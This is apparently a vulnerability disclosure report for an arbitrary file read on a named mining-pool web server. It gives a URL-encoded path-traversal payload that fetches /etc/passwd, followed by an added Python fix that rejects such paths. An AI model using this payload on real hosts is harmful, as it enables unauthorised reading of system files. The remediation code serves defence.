Vulnerability URL: fill in this field if the target is a web application
http://ethpool.xnpool.cn:9080/assets/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
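Brief description: vulnerability details, conditions for exploitation, impact, etc.
Arbitrary file read
Proof of vulnerability:
Exploit code: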
http://ethpool.xnpool.cn:9080/assets/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
Remediation:
Fix at the code level
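
One way to implement a code-level fix for the `..%2f` traversal reported above. This is an added example, not code from the original report or from the affected application. The report does not name the server stack, so Python, the `/assets/` prefix handling, and the names `resolve_asset`, `make_sample_tree` and `MAX_DECODE_ROUNDS` are assumptions.

```python
import os
import tempfile
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: anything nested deeper is rejected


def resolve_asset(base_dir, request_path, prefix="/assets/"):
    """Return the real path of a file under base_dir, or None to refuse."""
    if not request_path.startswith(prefix):
        return None
    rel = request_path[len(prefix):]
    # Decode until stable so "%2f" and double-encoded "%252f" both become "/".
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(rel)
        if decoded == rel:
            break
        rel = decoded
    else:
        return None  # still changing after the last round
    if "\x00" in rel or "\\" in rel:
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks before the containment check.
    target = os.path.realpath(os.path.join(base, rel))
    if os.path.commonpath([base, target]) != base:
        return None
    return target if os.path.isfile(target) else None


def make_sample_tree():
    """Build a constructed asset root holding css/site.css; return (root, file)."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="assets_"))
    os.makedirs(os.path.join(root, "css"))
    css = os.path.join(root, "css", "site.css")
    with open(css, "w") as fh:
        fh.write("body { margin: 0 }\n")
    return root, css


if __name__ == "__main__":
    root, _ = make_sample_tree()
    for path in ("/assets/css/site.css",
                 "/assets/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"):
        print(path, "->", resolve_asset(root, path))
```

The check is a containment test on the resolved path rather than a filter on the string `..`, so a request that uses `..` but stays inside the asset root is still served.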